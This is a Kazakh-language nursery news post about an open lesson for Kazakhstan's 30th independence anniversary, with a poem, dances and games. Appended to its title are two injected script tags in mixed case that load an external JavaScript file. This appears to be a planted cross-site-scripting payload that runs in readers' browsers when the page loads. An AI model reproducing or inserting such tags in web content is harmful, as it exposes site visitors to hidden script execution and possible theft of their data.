кіші «Нұрсәуле» тобында «Тәуелсіз елім – Қазақстан» атты ашық тәрбиелік-тақырыптық сағаты<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.12.2021

Қазақстан Республикасының Тәуелсіздігінің 30 жылдық мерей тойы қарсаңында МКҚК «Ақбота» бөбекжайының кіші «Нұрсәуле» тобында  «Тәуелсіз елім – Қазақстан» атты ашық тәрбиелік-тақырыптық сағаты өткізілді. 
Тәуелсіздік – тәубе екен бүгінде, 
Тәуелсіздік – тәубе сенің барыңа.
Тәуелсіздік әр сәбидің үнінде.
Тәуелсіздік әр қазақтың жанында!
Ашық тәрбиелік-тақырыптық сағаттың мақсаты балалардың Отанға деген сүйіспеншілігін оята отырып, елжандылыққа тәрбиелеу. Отан туралы түсініктерін кеңейту, патриоттық сезімдерін ояту.  Тәуелсіздік мерекесіне арналған  ашық тәрбиелік-тақырыптық сағаты әнұранмен басталып, балалардың жаттаған өлең шумақтары айтылды,  тобымыздың ұл-қыздарының орындауында "Қара жорға", «Қазақ» биін биледі  және «Ат шабу» ойыны ойнатылып, бірнеше ән орындалды. Балалар ашық тәрбиелік-тақырыптық сағатына белсене қатысып,  жақсы көңіл-күйде болды.

Просмотров: 266


Пікір қосу



Деректерді қолтаңбаға қосу